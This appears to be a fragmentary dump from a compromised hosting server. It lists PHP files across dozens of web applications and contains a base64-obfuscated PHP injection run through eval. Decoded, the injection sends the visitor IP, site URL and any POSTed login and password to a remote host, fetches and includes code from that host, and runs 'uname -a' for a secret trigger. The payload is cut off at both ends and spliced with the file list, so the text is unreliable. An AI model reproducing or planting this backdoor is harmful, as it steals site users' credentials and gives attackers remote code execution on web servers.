iAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc2Vlaygkb2Zmc2V0LCAkd2hlbmNlKSB7IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV90ZWxsKCkgeyByZXR1cm4gMDsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RyaXBvcygkZGF0YSwgJ0xvY2F0aW9uOiAnKSAhPT0gZmFsc2UpIHsgJG5ld19sb2NhdGlvbiA9IHRyaW0oc3RyX2lyZXBsYWNlKCdMb2NhdGlvbjogJywgJycsICRkYXRhKSk7IGJyZWFrOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB9IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLic6ICcuJG5ld19sb2NhdGlvbiwgRV9VU0VSX05PVElDRSk7ICR0aGlzLT5zdHJlYW1fY2xvc2UoKTsgcmV0dXJuICgkY1snbWF4X3JlZGlyZWN0cyddID4gJHRoaXMtPnJlZGlyZWN0cysrICYmICR0aGlzLT5zdHJlYW1fb3BlbigkbmV3X2xvY2F0aW9uLCAkdGhpcy0+ZGVmbW9kZSwgJHRoaXMtPm9wdGlvbnMsIG51bGwpICYmICR0aGlzLT5zdHJlYW1fZmx1c2goKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyAkaHR0cF9yZXNwb25zZV9oZWFkZXIgLj0gJGRhdGEuIlxyXG4iOyBpZiAoc3RyaXBvcygkZGF0YSwgJ0NvbnRlbnQtTGVuZ3RoOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ3NpemUnXSA9IHRyaW0oc3RyX2lyZXBsYWNlKCdDb250ZW50LUxlbmd0aDogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnRGF0ZTogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydhdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnRGF0ZTogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnTGFzdC1Nb2RpZmllZDogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydtdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnTGFzdC1Nb2RpZmllZDogJywgJycsICRkYXRhKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB9IGlmICgkaGVhZFsxXSA+PSA0MDApIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9XQVJOSU5HKTsgcmV0dXJuIGZhbHNlOyB9IGlmICgkaGVhZFsxXSA9PSAzMDQpIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9OT1RJQ0UpOyByZXR1cm4gZmFsc2U7IH0gcmV0dXJuIHRydWU7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCnB1YmxpYyBmdW5jdGlvbiBkaXJfb3BlbmRpcigkcGF0aCwgJG9wdGlvbnMpIHsgcmV0dXJuIGZhbHNlOyB9DQpwdWJsaWMgZnVuY3Rpb24gZGlyX3JlYWRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9jbG9zZWRpcigpIHsgcmV0dXJuOyB9DQpwdWJsaWMgZnVuY3Rpb24gdXJsX3N0YXQoJHBhdGgsICRmbGFncykgeyByZXR1cm4gYXJyYXkoKTsgfQ0KcHJvdGVjdGVkIGZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWyJsIl0pIGFuZCBpc3NldCgkX1BPU1RbInAiXSkpe2lmKGlzc2V0KCRfUE9TVFsiaW5wdXQiXSkpeyR1c2VyX2F1dGg9IiZsPSIuYmFzZTY0X2VuY29kZSgkX1BPU1RbImwiXSkuIiZwPSIuYmFzZTY0X2VuY29kZShtZDUoJF9QT1NUWyJwIl0pKTt9ZWxzZXskdXNlcl9hdXRoPSImbD0iLiRfUE9TVFsibCJdLiImcD0iLiRfUE9TVFsicCJdO319ZWxzZXskdXNlcl9hdXRoPSIiO31pZighaXNzZXQoJF9QT1NUWyJsb2dfZmxnIl0pKXskbG9nX2ZsZz0iJmxvZyI7fQ0KJHJraHQ9MTsNCmlmKHZlcnNpb25fY29tcGFyZShQSFBfVkVSU0lPTiwnNS4yJywnPj0nKSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2luY2x1ZGUnKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQppZigkcmtodD09MSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpeyRya2h0PTE7fWVsc2V7JHJraHQ9MDt9fQ0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiIkcCIuYmFzZTY0X2RlY29kZSgiTG5WelpYSnpMbUpwYzJobGJHd3VjblU9IikuIi8/cl9hZGRyPSIuc3ByaW50ZigiJXUiLCBpcDJsb25nKGdldGVudihSRU1PVEVfQUREUikpKS4iJnVybD0iLmJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJF9TRVJWRVJbUkVRVUVTVF9VUkldKS4kdXNlcl9hdXRoLiRsb2dfZmxnKSl7aWYoJF9QT1NUWyJsIl09PSJzcGVjaWFsIil7cHJpbnQgInN5c19hY3RpdmUiLmB1bmFtZSAtYWA7fX19DQplbHNle3N0cmVhbV93cmFwcGVyX3JlZ2lzdGVyKCdodHRwMicsJ25ld2h0dHAnKTtpZighQGluY2x1ZGVfb25jZShiYXNlNjRfZGVjb2RlKCJhSFIwY0RJNkx5OD0iKS4iJHAiLmJhc2U2NF9kZWNvZGUoIkxuVnpaWEp6TG1KcGMyaGxiR3d1Y25VPSIpLiIvP3JfYWRkcj0iLnNwcmludGYoIiV1IiwgaXAybG9uZyhnZXRlbnYoUkVNT1RFX0FERFIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXSkuJHVzZXJfYXV0aC4kbG9nX2ZsZykpe2lmKCRfUE9TVFsibCJdPT0ic3BlY2lhbCIpe3ByaW50ICJzeXNfYWN0aXZlIi5gdW5hbWUgLWFgO319fQ0K")); ?>
for files:
/home/www/confixx/html/webapps:
./phpsurveyor/guest.php ./phpsurveyor/messages.php ./weberp/guest.php ./weberp/messages.php ./openbiblio/finfo.php ./openbiblio/tests.php ./Owl/common.php ./Owl/contacts.php ./MovableType/remote.php ./MovableType/download.php ./pLog/report.php ./pLog/date.php ./squirrelmail/common.php ./squirrelmail/commands.php ./openit/links.php ./openit/tests.php ./phpBB/finfo.php ./phpBB/tests.php ./gtchat/configs.php ./gtchat/messages.php ./phpwebsite/layout.php ./phpwebsite/properties.php ./sendcard/time.php ./sendcard/date.php ./AutoIndex/configs.php ./AutoIndex/includes.php ./escene/report.php ./escene/date.php ./kplaylist/remote.php ./kplaylist/download.php ./phpwhois/create.php ./phpwhois/base.php ./CSLH/layout.php ./CSLH/properties.php ./dotproject/common.php ./dotproject/commands.php ./zencart/configs.php ./zencart/messages.php ./template/download.php ./template/base.php ./phpnuke/includes.php ./phpnuke/include.php ./phpMoney/system.php ./phpMoney/properties.php ./phpMyFamily/report.php ./phpMyFamily/include.php ./cubecart/system.php ./cubecart/time.php ./getid/links.php ./getid/package.php ./topdownloads/layout.php ./topdownloads/options.php ./osCommerce/create.php ./osCommerce/guest.php ./xrms/create.php ./xrms/guest.php ./eGroupWare/report.php ./eGroupWare/include.php ./phpBugTracker/create.php ./phpBugTracker/base.php ./phpSupportTickets/system.php ./phpSupportTickets/properties.php ./AdvancedPoll/create.php ./AdvancedPoll/guest.php ./knowledgetree/package.php ./knowledgetree/remote.php ./phpAds/finfo.php ./phpAds/contacts.php ./PHProjekt/system.php ./PHProjekt/properties.php ./nucleus/configs.php ./nucleus/includes.php ./SSM/commands.php ./SSM/options.php ./creloaded/finfo.php ./creloaded/contacts.php ./Links/system.php ./Links/properties.php ./b2evolution/configs.php ./b2evolution/includes.php ./pmachinefree/finfo.php ./pmachinefree/tests.php ./formmail/time.php ./formmail/date.php ./HelpCenterLive/finfo.php ./HelpCenterLive/contacts.php ./classifieds/download.php ./classifieds/base.php ./mediawiki/includes.php ./mediawiki/include.php ./vstat/commands.php ./vstat/options.php ./phpList/system.php ./phpList/time.php ./geeklog/system.php ./geeklog/time.php ./4images/configs.php ./4images/includes.php ./bbclone/create.php ./bbclone/base.php ./WebShopmanager/report.php ./WebShopmanager/date.php ./Coppermine/package.php ./Coppermine/remote.php ./guestbook/common.php ./guestbook/commands.php ./skins/common.php ./skins/contacts.php ./xaraya/links.php ./xaraya/package.php ./phpDig/common.php ./phpDig/commands.php ./osTicket/links.php ./osTicket/tests.php ./DocFAQ/links.php ./DocFAQ/tests.php ./Drupal/finfo.php ./Drupal/contacts.php ./Tellme/includes.php ./Tellme/include.php ./SupportLogic/common.php ./SupportLogic/contacts.php ./phpdocumentor/create.php ./phpdocumentor/guest.php ./gallery/commands.php ./gallery/options.php ./phpbannerexchange/layout.php ./phpbannerexchange/options.php ./Events/layout.php ./Events/options.php ./Care2x/download.php ./Care2x/base.php ./phpwcms/configs.php ./phpwcms/messages.php ./phpmyforum/links.php ./phpmyforum/tests.php ./WebCalendar/common.php ./WebCalendar/contacts.php ./videodb/remote.php ./videodb/download.php ./Mambo/time.php ./Mambo/date.php ./agoracart/package.php ./agoracart/remote.php ./WordPress/commands.php ./WordPress/options.php ./Siteframe/layout.php ./Siteframe/options.php ./UebiMiau/links.php ./UebiMiau/package.php ./wbbook/report.php ./wbbook/include.php ./phpWiki/report.php ./phpWiki/date.php ./YaBB/system.php ./YaBB/time.php ./TUTOS/guest.php ./TUTOS/messages.php ./phpBBAuction/time.php ./phpBBAuction/date.php ./xoops/layout.php ./xoops/properties.php ./typo/configs.php ./typo/messages.php ./bookstore/package.php ./bookstore/remote.php ./phpBook/layout.php ./phpBook/properties.php ./tsep/includes.php ./tsep/include.php ./PostNuke/report.php ./PostNuke/include.php ./noahclass/download.php ./noahclass/base.php
/home/www/confixx/html/skins:
./mskin_17/big_icons/system.php ./mskin_17/big_icons/properties.php ./mskin_17/layout.php ./mskin_17/css/main/create.php ./mskin_17/css/main/base.php ./mskin_17/css/top/remote.php ./mskin_17/css/top/download.php ./mskin_17/css/help/configs.php ./mskin_17/css/help/includes.php ./mskin_17/css/report.php ./mskin_17/css/include.php ./mskin_17/css/left/guest.php ./mskin_17/css/left/messages.php ./mskin_17/small_icons/finfo.php ./mskin_17/small_icons/tests.php ./mskin_17/options.php ./mskin_17/images/links.php ./mskin_17/images/package.php ./mskin_17/buttons/time.php ./mskin_17/buttons/date.php ./time.php ./date.php ./mskin_15/big_icons/configs.php ./mskin_15/big_icons/includes.php ./mskin_15/css/main/finfo.php ./mskin_15/css/main/tests.php ./mskin_15/css/create.php ./mskin_15/css/top/common.php ./mskin_15/css/top/contacts.php ./mskin_15/css/help/remote.php ./mskin_15/css/help/download.php ./mskin_15/css/left/links.php ./mskin_15/css/left/package.php ./mskin_15/css/base.php ./mskin_15/report.php ./mskin_15/small_icons/layout.php ./mskin_15/small_icons/properties.php ./mskin_15/include.php ./mskin_15/images/commands.php ./mskin_15/images/options.php ./mskin_15/buttons/guest.php ./mskin_15/buttons/messages.php
login-33.hoststar.ch
<?php error_reporting(0);$p="jdcczzazbzcc";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KcHJvdGVjdGVkIGZ1bmN0aW9uIGVycm9yKCRtc2c9J25vdCBjb25uZWN0ZWQnKSB7IGlmICgkdGhpcy0+b3B0aW9ucyAmIFNUUkVBTV9SRVBPUlRfRVJST1JTKSB7IHRyaWdnZXJfZXJyb3IoJG1zZywgRV9VU0VSX1dBUk5JTkcpOyB9IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9vcGVuKCRwYXRoLCAkbW9kZSwgJG9wdGlvbnMsICRvcGVuZWRfcGF0aCkgeyAkdGhpcy0+ZnVsbHVybCA9ICRwYXRoOyAkdGhpcy0+b3B0aW9ucyA9ICRvcHRpb25zOyAkdGhpcy0+ZGVmbW9kZSA9ICRtb2RlOyAkdXJsID0gcGFyc2VfdXJsKCRwYXRoKTsgaWYgKGVtcHR5KCR1cmxbJ2hvc3QnXSkpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignbWlzc2luZyBob3N0IG5hbWUnKTsgfSAkdGhpcy0+Y29ubl9pZCA9IGZzb2Nrb3BlbigkdXJsWydob3N0J10sIChlbXB0eSgkdXJsWydwb3J0J10pID8gODAgOiBpbnR2YWwoJHVybFsncG9ydCddKSksICRlcnJubywgJGVycnN0ciwgMik7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChlbXB0eSgkdXJsWydwYXRoJ10pKSB7ICR1cmxbJ3BhdGgnXSA9ICcvJzsgfSAkdGhpcy0+cF91cmwgPSAkdXJsOyAkdGhpcy0+Zmx1c2hlZCA9IGZhbHNlOyBpZiAoJG1vZGVbMF0gIT0gJ3InIHx8IChzdHJwb3MoJG1vZGUsICcrJykgIT09IGZhbHNlKSkgeyAkdGhpcy0+bW9kZSArPSAyOyB9ICR0aGlzLT5iaW5hcnkgPSAoc3RycG9zKCRtb2RlLCAnYicpICE9PSBmYWxzZSk7ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgaWYgKCFpc3NldCgkY1snbWV0aG9kJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21ldGhvZCcsICdHRVQnKTsgfSBpZiAoIWlzc2V0KCRjWydoZWFkZXInXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnaGVhZGVyJywgJycpOyB9IGlmICghaXNzZXQoJGNbJ3VzZXJfYWdlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAndXNlcl9hZ2VudCcsIGluaV9nZXQoJ3VzZXJfYWdlbnQnKSk7IH0gaWYgKCFpc3NldCgkY1snY29udGVudCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdjb250ZW50JywgJycpOyB9IGlmICghaXNzZXQoJGNbJ21heF9yZWRpcmVjdHMnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWF4X3JlZGlyZWN0cycsIDUpOyB9IHJldHVybiB0cnVlOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fcmVhZCgkYnl0ZXMpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+Zmx1c2hlZCAmJiAhJHRoaXMtPnN0cmVhbV9mbHVzaCgpKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZmVvZigkdGhpcy0+Y29ubl9pZCkpIHsgcmV0dXJuICcnOyB9ICRieXRlcyA9IG1heCgxLCRieXRlcyk7IGlmICgkdGhpcy0+YmluYXJ5KSB7IHJldHVybiBmcmVhZCgkdGhpcy0+Y29ubl9pZCwgJGJ5dGVzKTsgfSBlbHNlIHsgcmV0dXJuIGZnZXRzKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fd3JpdGUoJGRhdGEpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+bW9kZSAmIDIpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignU3RyZWFtIGlzIGluIHJlYWQtb25seSBtb2RlJyk7IH0gJGMgPSAkdGhpcy0+Y29udGV4dCgpOyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAoKCR0aGlzLT5kZWZtb2RlWzBdID09ICd4JykgPyAnUFVUJyA6ICdQT1NUJykpOyBpZiAoc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICRjWydjb250ZW50J10uJGRhdGEpKSB7IHJldHVybiBzdHJsZW4oJGRhdGEpOyB9IHJldHVybiAwOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc2Vlaygkb2Zmc2V0LCAkd2hlbmNlKSB7IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV90ZWxsKCkgeyByZXR1cm4gMDsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RyaXBvcygkZGF0YSwgJ0xvY2F0aW9uOiAnKSAhPT0gZmFsc2UpIHsgJG5ld19sb2NhdGlvbiA9IHRyaW0oc3RyX2lyZXBsYWNlKCdMb2NhdGlvbjogJywgJycsICRkYXRhKSk7IGJyZWFrOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB9IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLic6ICcuJG5ld19sb2NhdGlvbiwgRV9VU0VSX05PVElDRSk7ICR0aGlzLT5zdHJlYW1fY2xvc2UoKTsgcmV0dXJuICgkY1snbWF4X3JlZGlyZWN0cyddID4gJHRoaXMtPnJlZGlyZWN0cysrICYmICR0aGlzLT5zdHJlYW1fb3BlbigkbmV3X2xvY2F0aW9uLCAkdGhpcy0+ZGVmbW9kZSwgJHRoaXMtPm9wdGlvbnMsIG51bGwpICYmICR0aGlzLT5zdHJlYW1fZmx1c2goKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyAkaHR0cF9yZXNwb25zZV9oZWFkZXIgLj0gJGRhdGEuIlxyXG4iOyBpZiAoc3RyaXBvcygkZGF0YSwgJ0NvbnRlbnQtTGVuZ3RoOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ3NpemUnXSA9IHRyaW0oc3RyX2lyZXBsYWNlKCdDb250ZW50LUxlbmd0aDogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnRGF0ZTogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydhdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnRGF0ZTogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnTGFzdC1Nb2RpZmllZDogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydtdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnTGFzdC1Nb2RpZmllZDogJywgJycsICRkYXRhKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB9IGlmICgkaGVhZFsxXSA+PSA0MDApIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9XQVJOSU5HKTsgcmV0dXJuIGZhbHNlOyB9IGlmICgkaGVhZFsxXSA9PSAzMDQpIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9OT1RJQ0UpOyByZXR1cm4gZmFsc2U7IH0gcmV0dXJuIHRydWU7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCnB1YmxpYyBmdW5jdGlvbiBkaXJfb3BlbmRpcigkcGF0aCwgJG9wdGlvbnMpIHsgcmV0dXJuIGZhbHNlOyB